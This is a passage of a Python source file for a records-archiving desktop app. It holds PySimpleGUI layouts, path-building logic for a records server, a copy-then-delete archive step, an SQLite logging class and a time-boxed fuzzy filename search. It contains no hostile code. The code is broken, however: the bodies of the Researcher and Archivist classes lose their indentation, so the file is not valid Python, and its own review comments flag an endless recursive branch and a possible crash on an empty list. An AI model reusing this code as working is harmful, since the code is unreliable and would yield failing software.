                                                                  size=(listbox_width, listbox_height))],
            [sg.Text("Alternatively, Enter the full path to directory where the file has been archived:")],
            [sg.Input(key="Manual Path")],
            [sg.Checkbox(text="Include research with confirmation", default=research_default, key="Research")],
            [sg.Text("Notes: ")],
            [sg.Input(key="Notes")]
        ]
        destination_gui_layout.append([sg.Button("Ok"), sg.Button("Exit")])
        return destination_gui_layout

    def confirmation_layout(self, destination_path: str, destination_tree_data: sg.TreeData = None,
                            similar_files: List[str] = None, dir_trees: Dict[str, sg.TreeData] = None):
        """
        Layout asking the user to confirm the computed destination, optionally
        showing research results (similar filenames and example directories).

        :param destination_path: the path the user is confirming
        :param destination_tree_data: optional tree of the destination directory's contents
        :param similar_files: optional list of similarly named file paths
        :param dir_trees: optional mapping of example directory path -> sg.TreeData
        :return: PySimpleGUI layout list
        """
        # None sentinels instead of mutable defaults ([] / {}): mutable default
        # arguments are shared across calls and are a latent aliasing bug.
        if similar_files is None:
            similar_files = []
        if dir_trees is None:
            dir_trees = {}
        confirmation_gui_layout = [
            [sg.Text("Confirm this is correct location for this file:"), sg.Input(default_text=destination_path,
                                                                                  size=(len(destination_path),),
                                                                                  use_readonly_for_disable=True,
                                                                                  disabled=True,
                                                                                  background_color='#F7F3EC',
                                                                                  text_color="black",
                                                                                  key='Inert Destination Path')]]
        if destination_tree_data:
            destination_tree_element = sg.Tree(data=destination_tree_data,
                                               headings=['Size (KB)', ],
                                               auto_size_columns=True,
                                               select_mode=sg.TABLE_SELECT_MODE_EXTENDED,
                                               num_rows=6,
                                               col0_width=40,
                                               row_height=32,
                                               show_expanded=False,
                                               enable_events=False,
                                               expand_x=True,
                                               expand_y=True,
                                               )
            confirmation_gui_layout.append([sg.Text("Destination Directory Contents: "), destination_tree_element])
        if similar_files or dir_trees:
            confirmation_gui_layout.append([sg.HorizontalSeparator(pad=0)])
            confirmation_gui_layout.append([sg.Text("Research Results", size=(len(destination_path), 2), justification='center',
                                                    font=('bold'))])
        # if there is a list of similarly named files
        if similar_files:
            confirmation_gui_layout.append([sg.Text("Similar Filenames: ")])
            filepaths_text = ", \n".join(similar_files)
            confirmation_gui_layout.append([sg.Text(filepaths_text)])
        # create and append directory example structures into layout
        if dir_trees:
            confirmation_gui_layout.append([sg.Text("Examples of directories with the same filing codes: ")])
            tab_group_layout = []
            for tree_path, tree in dir_trees.items():
                # only use max of three examples
                if len(tab_group_layout) == 3:
                    break
                tree_element = sg.Tree(data=tree,
                                       headings=['Size (KB)', ],
                                       auto_size_columns=True,
                                       select_mode=sg.TABLE_SELECT_MODE_EXTENDED,
                                       num_rows=6,
                                       col0_width=40,
                                       row_height=32,
                                       show_expanded=False,
                                       enable_events=False,
                                       expand_x=True,
                                       expand_y=True,
                                       )
                tab_group_layout.append(sg.Tab(tree_path, layout=[[tree_element]]))
            confirmation_gui_layout.append([sg.TabGroup([tab_group_layout])])
        confirmation_gui_layout += [
            [sg.Button("Ok"), sg.Button("Back"), sg.Button("Exit")]
        ]
        return confirmation_gui_layout

    def failed_destination_layout(self, fail_reason: str, fail_path: str):
        """
        Layout shown when the chosen destination could not be used.

        :param fail_reason: human-readable reason the move failed
        :param fail_path: the destination path that could not be reconciled
        """
        failed_gui_layout = [
            [sg.Text("Could not reconcile the given destination choice:")],
            [sg.Text(fail_path)],
            [sg.Text("Reason for not being able to move file to selected destination:")],
            [sg.Text(fail_reason)],
            [sg.Button("Back"), sg.Button("Exit")]
        ]
        return failed_gui_layout

    def info_message_layout(self, info_message: str, error: bool = False):
        """
        :param info_message: Message for window
        :param error: whether the info message is an error (prepends an error header row)
        :return: PySimpleGUI layout list
        """
        info_gui_layout = [
            [sg.Text(info_message)],
            [sg.Button("Back"), sg.Button("Exit")]
        ]
        if error:
            info_gui_layout = [[sg.Text("Oops, an error occured:")]] + info_gui_layout
        return info_gui_layout

    def loading_screen(self, long_func, loading_window_name: str, loading_text: str):
        """
        This function opens a simple text window for the duration of the long_func function.
        It cannot return a value; long_func would need to be written to avoid having to use its return value.
        :param long_func: the function during which the loading screen will render.
        :param loading_window_name: text along the top of the window
        :param loading_text: Text that appears within the window
        :return: None
        """
        sg.theme(self.gui_theme)
        layout = [[sg.Text(loading_text)]]
        window = sg.Window(loading_window_name, layout)

        def close_window_after_function(some_func):
            # run the workload on a daemon thread, then signal the event loop
            time.sleep(.001)
            some_func()
            window.write_event_value('-THREAD DONE-', '')

        threading.Thread(target=close_window_after_function, args=(long_func,), daemon=True).start()
        while True:
            event, values = window.read()
            window.bring_to_front()
            if event in (sg.WIN_CLOSED, '-THREAD DONE-'):
                window.close()
                return
class ArchivalFile:
    """
    Represents a single file moving through the archival workflow.

    Tracks the file's current location plus the project/destination metadata
    chosen by the user, computes (and caches) the final destination path on
    the records server, and performs the copy-then-delete archive step.
    """
    def __init__(self, current_path: str, project: str = None, destination_path: str = None, new_filename: str = None,
                 notes: str = None, destination_dir: str = None, document_date: str = None):
        """
        :param current_path: path to file
        :param project: project number string
        :param destination_path: the desired path for the file when it is archived
        :param new_filename: optional file name for the destination file
        :param notes: for recording notes in the database
        :param destination_dir: chosen directory from the directory templates
        :param document_date: document date string; parsed with dateutil's parser
        """
        self.current_path = current_path
        # size is stored as a string of bytes, or 0 when the file is missing
        self.size = 0
        if self.current_path and os.path.exists(self.current_path):
            self.size = str(os.path.getsize(current_path))
        self.project_number = project
        self.destination_dir = destination_dir
        self.new_filename = new_filename
        self.notes = notes
        # destination path is computed lazily by get_destination_path() and cached here
        self.cached_destination_path = destination_path
        self.datetime_archived = None
        # filing code (eg "E5") derived from the chosen destination directory name
        self.file_code = None
        if destination_dir:
            self.file_code = ArchiverUtilities.file_code_from_destination_dir(destination_dir)
        self.document_date = None
        if document_date:
            self.document_date = parser.parse(document_date)

    def assemble_destination_filename(self):
        """
        returns the resulting anticipated filename from an anticipated archival process. Handles extensions by copying
        them from current filename to desired new filename
        :return: filename string of the form "<project number>.<file code>.<name>.<ext>"
        """
        current_filename = ArchiverUtilities.split_path(self.current_path)[-1]
        dest_filename = current_filename
        if self.new_filename:
            dest_filename = self.new_filename
        extension = current_filename.split(".")[-1]
        split_dest_components = dest_filename.split(".")
        # if the destination filename didn't include the file extension add it to the filename component list
        if not split_dest_components[-1] == extension:
            split_dest_components.append(extension)
        # prepend project number and filing code, eg "1234.E5.report.pdf"
        prefix_list = [self.project_number, self.file_code]
        split_dest_components = prefix_list + split_dest_components
        destination_filename = ".".join(split_dest_components)
        return destination_filename

    def nested_large_template_destination_dir(self):
        """
        eg "E - Program and Design\E5 - Correspondence"
        :return: destination directory name, prefixed with its large-template
                 parent directory when the destination is a child directory
        """
        # TODO handle situation when there is a cached_destination_path but no destination_dir_name
        nested_dirs = self.destination_dir
        # NOTE(review): assumes destination_dir has at least two characters -- TODO confirm
        if nested_dirs[1].isdigit():
            # a directory from DIRECTORY_CHOICES is parent directory if it shares same first char and doesn't have a
            # digit in second char position
            is_parent_dir = lambda child_dir, dir: dir[0] == child_dir[0] and not dir[1].isdigit()
            parent_dir = [dir for dir in DIRECTORY_CHOICES if is_parent_dir(nested_dirs, dir)][0]
            nested_dirs = os.path.join(parent_dir, nested_dirs)
        return str(nested_dirs)

    def get_destination_path(self):
        """
        Major function that builds a plausible path string in the following steps:
        Step 1: If it already has a cached destination path, return that
        Step 2: Looks for xx directory in root (RECORDS_SERVER_LOCATION) and adds to path
        Step 3: Looks through next two levels in directory hierarchy for directories that start with the project number
        or a project number prefix and add them to the path.
        Step 4: Looks for desired directory location in nested levels and adds it to new path
        ...unless there is already a path in cached_destination_path attribute, in which case that will be returned
        :return: string (or path object?)
        """

        def list_of_child_dirs(parent_directory_path):
            """sub-function for getting a list of just the child directories given a parent directory path"""
            return [dir for dir in os.listdir(parent_directory_path) if
                    not os.path.isfile(os.path.join(parent_directory_path, dir))]

        def path_from_project_num_dir_to_destination(path_to_project_num_dir: str, large_template_destination: str,
                                                     destination_filename: str):
            """
            Sub-routine for constructing the remainder of the destination path after building the path up to the
            directory corresponding to the archive file project number.
            :param path_to_project_num_dir: path thus constructed to the directory corresponding to the archive file
            project number
            :param large_template_destination: given by ArchivalFile.nested_large_template_destination_dir()
            :param destination_filename: given by ArchivalFile.assemble_destination_filename()
            :return: string final destination path
            """
            new_path = path_to_project_num_dir
            # if the path to the dir corresponding to the project number doesn't exist, just return the completed
            # destination filepath
            if not os.path.exists(new_path):
                new_path = os.path.join(new_path, large_template_destination)
                return os.path.join(new_path, destination_filename)
            new_path_dirs = list_of_child_dirs(new_path)
            destination_dir = ArchiverUtilities.split_path(large_template_destination)[-1]
            destination_dir_prefix = destination_dir.split(" ")[0] + " - "  # eg "F5 - ", "G12 - ", "H - ", etc
            destination_dir_parent_dir = ArchiverUtilities.split_path(large_template_destination)[0]
            # if the destination directory is a large template child director...
            if not destination_dir_parent_dir == large_template_destination:
                # need to extrapolate the parent directory prefix given the desired destination directory. eg for
                # destination "F5 - Drawings and Specifications" the parent directory prefix is "F - "
                destination_dir_parent_dir_prefix = destination_dir_parent_dir.split(" ")[0] + " - "  # eg "F - ", "G - ", etc
                parent_dirs = [dir_name for dir_name in new_path_dirs if
                               dir_name.upper().startswith(destination_dir_parent_dir_prefix.upper())]
                if len(parent_dirs) > 0:
                    # TODO cause we're lazy we'll just assume parent_dirs is only len = 1. Maybe should handle other situations?
                    new_path = os.path.join(new_path, parent_dirs[0])
                    new_path_dirs = [dir_name for dir_name in os.listdir(new_path) if
                                     not os.path.isfile(os.path.join(new_path, dir_name))]
                    existing_destination_dirs = [dir_name for dir_name in new_path_dirs if
                                                 dir_name.upper().startswith(destination_dir_prefix)]
                    if existing_destination_dirs:
                        # again, assuming only one dir matches the destination dir prefix:
                        new_path = os.path.join(new_path, existing_destination_dirs[0])
                    else:
                        new_path = os.path.join(new_path, destination_dir)
                # if there is no directory in the destination project folder that corresponds to the parent directory of
                # destination directory in a large template path...
                else:
                    # check for existing equivalents of destination directory
                    new_path_dirs = list_of_child_dirs(new_path)
                    existing_destination_dirs = [dir_name for dir_name in new_path_dirs if
                                                 dir_name.upper().startswith(destination_dir_prefix)]
                    if existing_destination_dirs:
                        new_path = os.path.join(new_path, existing_destination_dirs[0])
                    else:
                        project_num_dirs = [dir for dir in new_path_dirs if dir.lower().startswith(self.project_number)]
                        if not project_num_dirs:
                            new_path = os.path.join(new_path, large_template_destination)
                        else:
                            new_path = os.path.join(new_path, project_num_dirs[0])
                            return path_from_project_num_dir_to_destination(path_to_project_num_dir=new_path,
                                                                            large_template_destination=large_template_destination,
                                                                            destination_filename=destination_filename)
            # if the destination_dir_name doesn't have a project template dir parent...
            else:
                existing_destination_dirs = [dir_name for dir_name in new_path_dirs if
                                             dir_name.upper().startswith(destination_dir_prefix)]
                if existing_destination_dirs:
                    new_path = os.path.join(new_path, existing_destination_dirs[0])
                else:
                    file_num_dirs = [dir for dir in new_path_dirs if
                                     dir.lower().startswith(self.project_number.lower())]
                    if not file_num_dirs:
                        new_path = os.path.join(new_path, large_template_destination)
                    else:
                        # NOTE(review): this recursive call passes new_path UNCHANGED (file_num_dirs[0] is
                        # never joined onto it), so if this branch is reached it recurses with identical
                        # arguments -- likely a missing os.path.join(new_path, file_num_dirs[0]); verify.
                        return path_from_project_num_dir_to_destination(path_to_project_num_dir=new_path,
                                                                        large_template_destination=large_template_destination,
                                                                        destination_filename=destination_filename)
            return os.path.join(new_path, destination_filename)

        ############### Start of get_destination_path() #################
        if not self.cached_destination_path:
            # derive the 'xx' bucket prefix (eg "12xx") and numeric prefix from the project number
            xx_level_dir_prefix, project_num_prefix = ArchiverUtilities.prefixes_from_project_number(self.project_number)
            root_directories_list = list_of_child_dirs(RECORDS_SERVER_LOCATION)
            matching_root_dirs = [dir_name for dir_name in root_directories_list if
                                  dir_name.lower().startswith(xx_level_dir_prefix.lower())]
            # if we have more than one matching root dir we throw an error
            if len(matching_root_dirs) != 1:
                raise Exception(
                    f"{len(matching_root_dirs)} matching directories in {RECORDS_SERVER_LOCATION} for project number {self.project_number}")
            # add the directory matching the xx level prefix for this project number
            new_path = os.path.join(RECORDS_SERVER_LOCATION, matching_root_dirs[0])
            # list of contents of xx level directory which are not files (ie directories in xx level directory)
            xx_dir_dirs = list_of_child_dirs(new_path)
            # lambda functions that check whether a directory name starts with either project number or
            # prefix respectively.
            proj_num_in_dir_name = lambda dir_name: self.project_number == dir_name.split(" ")[0]
            prefix_in_dir_name = lambda dir_name: project_num_prefix == dir_name.split(" ")[0]
            dirs_matching_proj_num = [dir_name for dir_name in xx_dir_dirs if proj_num_in_dir_name(dir_name)]
            # if more than one directory starts with the same project number...
            if len(dirs_matching_proj_num) > 1:
                raise Exception(
                    f"{len(dirs_matching_proj_num)} matching directories in {new_path} for project number {self.project_number}; expected 0 or 1.")
            # if no directories match the project number...
            if len(dirs_matching_proj_num) == 0:
                dirs_matching_prefix = [dir_name for dir_name in xx_dir_dirs if prefix_in_dir_name(dir_name)]
                if len(dirs_matching_prefix) > 1:
                    raise Exception(
                        f"{len(dirs_matching_prefix)} matching directories in {new_path} for prefix for project number {self.project_number}; expected 0 or 1.")
                # if there is now project number or prefix directory at the 'xx' level, it will need to be made
                if len(dirs_matching_prefix) == 0:
                    new_path = os.path.join(new_path, project_num_prefix)
                    new_path = os.path.join(new_path, self.project_number)
                    new_path = os.path.join(new_path, self.nested_large_template_destination_dir())
                    new_path = os.path.join(new_path, self.assemble_destination_filename())
                    self.cached_destination_path = new_path
                    return new_path
                if len(dirs_matching_prefix) == 1:
                    # if a dir exists that does begin with the prefix, we'll add it to our path and look again for
                    # directories that begin with the project number #TODO ..and prefix again too?
                    new_path = os.path.join(new_path, dirs_matching_prefix[0])
                    prefix_dir_dirs = list_of_child_dirs(new_path)
                    dirs_matching_proj_num = [dir_name for dir_name in prefix_dir_dirs if
                                              proj_num_in_dir_name(dir_name)]
                    if len(dirs_matching_proj_num) > 1:
                        # NOTE(review): unlike the sibling branches this logs and returns '' instead of
                        # raising, so callers receive an empty path; confirm the asymmetry is intentional.
                        logging.exception(
                            f"{len(dirs_matching_proj_num)} matching directories in {new_path} for project number {self.project_number}; expected 0 or 1.",
                            exc_info=True)
                        return ''
                    # if no dirs are equivalent to the project number
                    if len(dirs_matching_proj_num) == 0:
                        new_path = os.path.join(new_path, self.project_number)
                        new_path = path_from_project_num_dir_to_destination(new_path,
                                                                            self.nested_large_template_destination_dir(),
                                                                            self.assemble_destination_filename())
                        self.cached_destination_path = new_path
                        return self.cached_destination_path
                    if len(dirs_matching_proj_num) == 1:
                        new_path = os.path.join(new_path, dirs_matching_proj_num[0])
                        new_path = path_from_project_num_dir_to_destination(new_path,
                                                                            self.nested_large_template_destination_dir(),
                                                                            self.assemble_destination_filename())
                        self.cached_destination_path = new_path
                        return self.cached_destination_path
            # if we do find a dir that corresponds with the project number...
            if len(dirs_matching_proj_num) == 1:
                new_path = os.path.join(new_path, dirs_matching_proj_num[0])
                # look for another project number directory in the dirs of this project number directory
                proj_num_dir_dirs = list_of_child_dirs(new_path)
                dirs_matching_proj_num = [dir_name for dir_name in proj_num_dir_dirs if proj_num_in_dir_name(dir_name)]
                # if more than one directory starts with the same project number...
                if len(dirs_matching_proj_num) not in (0,1):
                    raise Exception(
                        f"{len(dirs_matching_proj_num)} matching directories in {new_path} for project number {self.project_number}; expected 0 or 1.")
                if len(dirs_matching_proj_num) == 0:
                    new_path = os.path.join(new_path, self.project_number)
                if len(dirs_matching_proj_num) == 1:
                    new_path = os.path.join(new_path, dirs_matching_proj_num[0])
                new_path = path_from_project_num_dir_to_destination(path_to_project_num_dir= new_path,
                                                                    large_template_destination= self.nested_large_template_destination_dir(),
                                                                    destination_filename= self.assemble_destination_filename())
                self.cached_destination_path = new_path
                return self.cached_destination_path
            # fallback: cache whatever path was built so far
            self.cached_destination_path = new_path
        return self.cached_destination_path

    def attribute_defaultdict(self):
        """
        Build a defaultdict of this file's metadata keyed to match the
        archived_files table columns; missing keys resolve to None.
        :return: defaultdict(lambda: None, {...})
        """
        date_stamp = ''
        doc_date = ''
        if self.datetime_archived:
            date_stamp = self.datetime_archived.strftime("%m/%d/%Y, %H:%M:%S")
        if self.document_date:
            doc_date = self.document_date.strftime("%m/%d/%Y, %H:%M:%S")
        # size may still be 0 if the file was missing at construction time; measure it now,
        # from whichever of the two locations currently holds the file
        if (self.get_destination_path() or self.current_path) and not self.size:
            if not os.path.isfile(self.get_destination_path()):
                self.size = str(os.path.getsize(self.current_path))
            else:
                self.size = str(os.path.getsize(self.get_destination_path()))
        #if we don't have a file code, generate one from the destination
        if self.destination_dir and not self.file_code:
            self.file_code = ArchiverUtilities.file_code_from_destination_dir(self.destination_dir)
        if not self.project_number:
            self.project_number = ArchiverUtilities.project_number_from_path(self.get_destination_path())
        attribute_dict = {"date_archived": date_stamp, "project_number": self.project_number,
                          "destination_path": self.get_destination_path(), "document_date": doc_date,
                          "destination_directory": self.destination_dir, "file_code": self.file_code,
                          "file_size": self.size, "notes": self.notes}
        return defaultdict(lambda: None, attribute_dict)

    def check_permissions(self):
        """
        Returns a string describing issues with permissions that may arise when trying to archive the file.
        :return: empty string when no issues were detected
        """
        if not os.path.exists(self.current_path):
            return f"The file no longer exists {self.current_path}"
        issues_found = ''
        try:
            # renaming a file onto itself is a cheap probe for locks / access errors
            os.rename(self.current_path, self.current_path)
        except OSError as e:
            issues_found = "Access error on file using renaming test:" + '! \n' + str(e) + "\n"
        if not os.access(self.current_path, os.R_OK):
            issues_found += "No read access for the file.\n"
        if not os.access(self.current_path, os.W_OK):
            issues_found += "No write access for the file.\n"
        if not os.access(self.current_path, os.X_OK):
            issues_found += "No execution access for the file.\n"
        return issues_found

    def archive(self):
        """
        Copy the file to its destination (creating directories as needed) and
        remove the original.
        :return: destination path when already archived; otherwise a
                 (success: bool, error: Exception or '') tuple
        """
        # if the file has already been archived return the destination path
        if self.datetime_archived:
            return self.get_destination_path()
        destination_path_list = ArchiverUtilities.split_path(self.get_destination_path())
        # NOTE(review): os.path.join(*parts) of a split absolute path can drop the leading
        # separator on POSIX -- depends on how ArchiverUtilities.split_path handles the root; verify.
        destination_dir_path = os.path.join(*destination_path_list[:-1])
        if not os.path.exists(destination_dir_path):
            os.makedirs(destination_dir_path)
        self.datetime_archived = datetime.now()
        try:
            shutil.copyfile(src=self.current_path, dst=self.get_destination_path())
        except Exception as e:
            return False, e
        try:
            os.remove(self.current_path)
            return True, ''
        except Exception as e:
            return False, e
class SqliteDatabase:
    """
    Thin wrapper around the sqlite archive database: creates the archivists
    and archived_files tables on construction and provides insert/lookup helpers.
    """
    def __init__(self, path):
        """
        :param path: filesystem path of the sqlite database file (created if absent)
        """
        self.datetime_format = "%m/%d/%Y, %H:%M:%S"
        self.path = path
        self.archivist_tablename = 'archivists'
        self.document_tablename = 'archived_files'
        self.connection = sqlite3.connect(self.path)
        self.archivists_table_cols = {'email': 'TEXT NOT NULL'}
        self.archived_doc_table_cols = {'destination_path': 'TEXT', 'project_number': 'TEXT',
                                        'document_date': 'TEXT', 'destination_directory': 'TEXT',
                                        'file_code': 'TEXT', 'file_size': 'REAL', 'date_archived': 'TEXT',
                                        'archivist_id': 'INTEGER NOT NULL', 'notes' : 'TEXT'
                                        }
        # Creates tables if they do not exist yet. Column clauses are assembled
        # with ", ".join instead of trimming a trailing "," + os.linesep with a
        # fixed-width slice: the old [:-3]/[:-4] slices assumed the two-character
        # Windows line separator and produced malformed SQL on POSIX systems.
        with closing(sqlite3.connect(self.path)) as conn:
            with conn:  # commits on success, rolls back on error
                c = conn.cursor()
                archivist_col_defs = [f"{col.strip()} {col_type.strip()}"
                                      for col, col_type in self.archivists_table_cols.items()]
                archivists_setup_sql = (f"CREATE TABLE IF NOT EXISTS {self.archivist_tablename} "
                                        f"(id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE, "
                                        + ", ".join(archivist_col_defs) + ");")
                c.execute(archivists_setup_sql)
                doc_col_defs = []
                foreign_keys = []
                for col, col_type in self.archived_doc_table_cols.items():
                    col = col.strip()
                    col_type = col_type.strip()
                    doc_col_defs.append(f"{col} {col_type}")
                    # any '...id' column references the archivists table
                    if col.lower().endswith('id'):
                        foreign_keys.append(f"FOREIGN KEY({col}) REFERENCES {self.archivist_tablename}(id)")
                archival_docs_setup_sql = (f"CREATE TABLE IF NOT EXISTS {self.document_tablename} "
                                           f"(id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE, "
                                           + ", ".join(doc_col_defs + foreign_keys) + ");")
                c.execute(archival_docs_setup_sql)

    def add_user(self, archivist_dict):
        """
        Insert a new archivist row.
        :param archivist_dict: mapping with a value for every archivists-table column, eg {'email': ...}
        """
        column_names = list(self.archivists_table_cols.keys())
        questionmark_placeholders = ",".join(['?' for _ in column_names])
        sql_cols = ",".join(column_names)
        insert_sql = f""" INSERT INTO {self.archivist_tablename}({sql_cols}) VALUES({questionmark_placeholders}) """
        # closing() closes the connection; `with conn` commits the insert
        with closing(sqlite3.connect(self.path)) as conn, conn:
            c = conn.cursor()
            vals = tuple([archivist_dict[k] for k in column_names])
            c.execute(insert_sql, vals)

    def user_id_from_email(self, user_email):
        """
        Look up the archivist id for an email address, creating the row if it
        does not yet exist.
        :param user_email: archivist email string
        :return: integer archivist id
        """
        with closing(sqlite3.connect(self.path)) as conn:
            c = conn.cursor()
            user_id = None
            # loop at most twice: miss -> insert -> hit
            while not user_id:
                get_user_id_sql = f"""SELECT id FROM {self.archivist_tablename} WHERE email = ?"""
                c.execute(get_user_id_sql, (user_email,))
                sql_results = c.fetchone()
                if not sql_results:
                    self.add_user({'email': user_email})
                    continue
                user_id = sql_results[0]
            return user_id

    def record_document(self, arch_document: 'ArchivalFile', archivist_email):
        """
        Insert a row describing an archived document.
        :param arch_document: the ArchivalFile whose metadata should be recorded
        :param archivist_email: email of the archivist performing the archive
        """
        column_names = list(self.archived_doc_table_cols.keys())
        questionmark_placeholders = ",".join(['?' for _ in column_names])
        sql_cols = ",".join(column_names)
        insert_sql = f""" INSERT INTO {self.document_tablename}({sql_cols}) VALUES({questionmark_placeholders}) """
        with closing(sqlite3.connect(self.path)) as conn, conn:
            c = conn.cursor()
            attribute_val_dict = arch_document.attribute_defaultdict()
            attribute_val_dict['archivist_id'] = self.user_id_from_email(archivist_email)
            archived_doc_vals = []
            for col in column_names:
                # date_archived is always stamped at insert time
                if col == 'date_archived':
                    archived_doc_vals.append(datetime.now().strftime(self.datetime_format))
                    continue
                archived_doc_vals.append(attribute_val_dict[col])
            c.execute(insert_sql, archived_doc_vals)
class Researcher:
def __init__(self):
    """Set up the list of xx-level directory names that research searches should skip."""
    ignored_xx_dirs = [
        "01XX JOCs",
        "00xx Consulting Agreements",
        "10xx Regulatory Requirements",
        "110xx Infrastructure Planning Documents and Studies",
        "111xx Area Planning Documents and Studies",
        "112xx Proposed Structure Planning Documents and Studies",
        "113xx Environmental Planning Documents and Studies",
        "114xx Long Range Development Planning (LRDP) Documents and Studies",
        "115xx Student Issues Planning & Studies",
        "116xx Economic Planning Documents and Studies",
        "117xx Handicap ADA Planning Documents and Studies",
        "130xx Campus Reference Materials",
        "140xx Storm Water Management",
    ]
    self.xx_dirs_to_ignore = ignored_xx_dirs
def similar_filename_paths(self, original_filename, duration=6, similarity_threshold=72, max_paths=10):
    """
    Randomized, time-boxed search of the records server for files whose names
    fuzzily match *original_filename*.

    :param original_filename: (not the path)
    :param duration: length of time in seconds that this search algorithm can run
    :param similarity_threshold: how similar a filename needs to be to be included as similar
    :param max_paths: maximum number of results that will be returned
    :return: list of {"filepath": str, "ratio": int} dicts (note: dicts, not bare path strings)
    """
    # TODO: could be made better by removing common, unhelpful tokens from original_filename
    # TODO: could be made better by removing very short (or comparably short) filenames from being compared to original_filename
    # start search timer
    start_time = time.time()
    current_time = start_time
    similarly_named_files = []
    # copy so already-searched xx dirs can be appended without mutating the instance list
    dirs_to_ignore = self.xx_dirs_to_ignore.copy()
    # tests directory to see if it should be considered when searching for similar files.
    is_xx_dir_to_search = lambda dir_name: ('xx' in dir_name.lower().split(" ")[0]) and (
            not os.path.isfile(os.path.join(RECORDS_SERVER_LOCATION, dir_name))) and (
            dir_name not in dirs_to_ignore)
    # While this search has not taken up the allocated time or found sufficient number of similar files...
    # NOTE(review): if every candidate xx dir ends up in dirs_to_ignore before the deadline,
    # random.randint(0, -1) on the empty list would raise ValueError -- TODO confirm this can't happen.
    while (current_time - start_time) < duration and len(similarly_named_files) < max_paths:
        xx_level_dirs = [d for d in os.listdir(RECORDS_SERVER_LOCATION) if is_xx_dir_to_search(d)]
        random_index = random.randint(0, len(xx_level_dirs) - 1)
        # Path of random xx level directory where we will initialize a search.
        random_xx_start = os.path.join(RECORDS_SERVER_LOCATION, xx_level_dirs[random_index])
        dirs_to_ignore.append(xx_level_dirs[random_index])
        # choose another directory at random from which to begin search
        number_dirs = [dir for dir in os.listdir(random_xx_start) if
                       os.path.isdir(os.path.join(random_xx_start, dir))]
        random_index2 = random.randint(0, len(number_dirs) - 1)
        random_search_start = os.path.join(random_xx_start, number_dirs[random_index2])
        # Iterate through directory structure from the random starting dir...
        for root, dirs, files in os.walk(random_search_start):
            found_similar_file = False
            for some_file in files:
                # fuzzy token-set comparison (fuzzywuzzy); higher ratio == more similar
                ratio = fuzz.token_set_ratio(original_filename, some_file)
                # if the fuzzy filename comparison calculates a similarity above our threshhold...
                if ratio > similarity_threshold:
                    # record the match and move on to a fresh random starting point
                    similar_file_filepath = os.path.join(root, some_file)
                    similarly_named_files.append({"filepath": similar_file_filepath, "ratio": ratio})
                    found_similar_file = True
                    break
            current_time = time.time()
            # abandon this walk after a hit or once the time budget is spent
            if found_similar_file or (current_time - start_time) > duration:
                break
    return similarly_named_files
def randomized_destination_examples(self, dest_dir, num_of_examples=3,
                                    duration=4, files_in_example=3):
    """
    Starting at a random location in the directories within the xx level directories, search for examples of the
    same destination directory with at least a sufficient number of files in it to be used as examples --
    demonstrating the types of files that would be found in a given destination directory.

    :param dest_dir: str name of the destination directory
    :param num_of_examples: int number of destination directory paths to be returned
    :param duration: int allotted number of seconds for this function to search for
    :param files_in_example: int minimum number of files to be in a directory for it to be considered an example
    :return: list of path strings
    """

    def is_good_dir_example(chosen_destination_dir, dir_example_path, desired_files_num=files_in_example):
        """
        Decide whether dir_example_path is a good example of the chosen directory type: for the purposes
        of this application it must start with the same filing code (eg C1.2, F10, H) and contain at
        least desired_files_num files.
        """

        def probably_has_filing_code(dir_name):
            # A directory name probably starts with a filing code (eg C1.2, F10, H) if it starts with a
            # letter and, when split by spaces, the second element is a dash. #TODO may need improving
            pieces = dir_name.split(" ")
            return len(pieces) > 2 and dir_name[0].isalpha() and pieces[1] == "-"

        example_dir_name = ArchiverUtilities.split_path(dir_example_path)[-1]
        if not probably_has_filing_code(example_dir_name):
            return False
        # If the directory doesn't share a filing code with the chosen destination dir it is not a good example.
        example_file_code = ArchiverUtilities.file_code_from_destination_dir(example_dir_name)
        if ArchiverUtilities.file_code_from_destination_dir(chosen_destination_dir) != example_file_code:
            return False
        # If the example directory doesn't have enough files in it, it is a bad example.
        # (Local renamed from files_in_example to stop shadowing the enclosing parameter.)
        example_files = [f for f in os.listdir(dir_example_path)
                         if os.path.isfile(os.path.join(dir_example_path, f))]
        return len(example_files) >= desired_files_num

    start_time = time.time()
    current_time = start_time
    example_dir_paths = []
    dirs_to_ignore = self.xx_dirs_to_ignore.copy()

    def is_xx_dir_to_search(dir_name):
        # Only consider 'xx' level entries that are real directories and have not already been searched.
        return ('xx' in dir_name.lower().split(" ")[0]
                and not os.path.isfile(os.path.join(RECORDS_SERVER_LOCATION, dir_name))
                and dir_name not in dirs_to_ignore)

    # While the allotted duration has not been used and we haven't found enough good destination
    # examples, choose a random xx level directory and a subsequent random project number directory
    # to search for another example of the destination directory.
    while (current_time - start_time) < duration and len(example_dir_paths) < num_of_examples:
        xx_level_dirs = [d for d in os.listdir(RECORDS_SERVER_LOCATION) if is_xx_dir_to_search(d)]
        if not xx_level_dirs:
            # Every candidate xx dir has been tried. The previous code crashed here
            # (random.randint(0, -1) raises ValueError) instead of stopping gracefully.
            break
        random_xx_dir = random.choice(xx_level_dirs)
        # Path of random xx level directory where we will initialize a search.
        random_xx_start = os.path.join(RECORDS_SERVER_LOCATION, random_xx_dir)
        dirs_to_ignore.append(random_xx_dir)
        # Choose another directory at random from which to begin the search.
        number_dirs = [d for d in os.listdir(random_xx_start)
                       if os.path.isdir(os.path.join(random_xx_start, d))]
        current_time = time.time()
        if not number_dirs:
            # Nothing to walk under this xx dir; it is now in dirs_to_ignore, so the loop
            # still terminates. (Previously this was an unhandled ValueError as well.)
            continue
        random_search_start = os.path.join(random_xx_start, random.choice(number_dirs))
        # Iterate through the directory structure from the random starting dir...
        for root, dirs, files in os.walk(random_search_start):
            if is_good_dir_example(chosen_destination_dir=dest_dir, dir_example_path=root):
                # Add good example path to the example path list and move on to the next xx dir.
                example_dir_paths.append(root)
                current_time = time.time()
                break
            current_time = time.time()
            if (current_time - start_time) > duration:
                break
    return example_dir_paths
class Archivist:
"""
Class for executing main archiving procedure
"""
def __init__(self, files_to_archive_directory: str, app_files_directory: str, records_drive_path: str,
             gui_file_icon: str, gui_dir_icon: str, database_location: str,
             file_to_archive: ArchivalFile = None):
    """
    Build the necessary directory structure and wire up the GUI, researcher and database.

    :param files_to_archive_directory: directory watched for files that need archiving
    :param app_files_directory: directory for the app's own support files (icons, temp copies)
    :param records_drive_path: root path of the records drive
    :param gui_file_icon: filename (within app_files_directory) of the file icon, or '' for none
    :param gui_dir_icon: filename (within app_files_directory) of the folder icon, or '' for none
    :param database_location: path handed to SqliteDatabase
    :param file_to_archive: optionally pre-queued ArchivalFile
    """

